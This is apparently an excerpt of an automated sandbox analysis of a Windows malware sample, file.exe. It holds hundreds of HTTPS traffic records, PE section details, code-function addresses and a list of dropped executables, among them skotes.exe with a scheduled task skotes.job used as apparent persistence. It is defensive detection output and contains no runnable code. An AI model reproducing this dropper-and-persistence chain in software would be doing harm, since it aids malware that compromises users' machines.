Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443

Source: unknown	HTTPS traffic detected: 40.126.53.11:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.53.11:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.206.197.26:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.234.120.54:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.206.197.42:443 -> 192.168.2.6:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:50045 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: random[1].exe.1.dr	Static PE information: section name:
Source: random[1].exe.1.dr	Static PE information: section name: .idata
Source: JJECFIECBG.exe.1.dr	Static PE information: section name:
Source: JJECFIECBG.exe.1.dr	Static PE information: section name: .idata
Source: skotes.exe.19.dr	Static PE information: section name:
Source: skotes.exe.19.dr	Static PE information: section name: .idata
Source: random[1].exe.22.dr	Static PE information: section name:
Source: random[1].exe.22.dr	Static PE information: section name: .idata
Source: random[1].exe.22.dr	Static PE information: section name:
Source: 60949160aa.exe.22.dr	Static PE information: section name:
Source: 60949160aa.exe.22.dr	Static PE information: section name: .idata
Source: 60949160aa.exe.22.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9CB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6C9CB700
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9CB8C0 rand_s,NtQueryVirtualMemory,	1_2_6C9CB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9CB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	1_2_6C9CB910
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C96F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	1_2_6C96F280

Source: C:\Users\user\Documents\JJECFIECBG.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9635A0	1_2_6C9635A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C976C80	1_2_6C976C80
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9C34A0	1_2_6C9C34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9CC4A0	1_2_6C9CC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C98D4D0	1_2_6C98D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9764C0	1_2_6C9764C0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9A6CF0	1_2_6C9A6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C96D4E0	1_2_6C96D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9A5C10	1_2_6C9A5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9B2C10	1_2_6C9B2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9DAC00	1_2_6C9DAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9D542B	1_2_6C9D542B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9D545C	1_2_6C9D545C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C975440	1_2_6C975440
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9A0DD0	1_2_6C9A0DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9C85F0	1_2_6C9C85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C98ED10	1_2_6C98ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C990512	1_2_6C990512
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C97FD00	1_2_6C97FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C985E90	1_2_6C985E90
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9CE680	1_2_6C9CE680
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C9C4EA0	1_2_6C9C4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_6C96BEF0	1_2_6C96BEF0
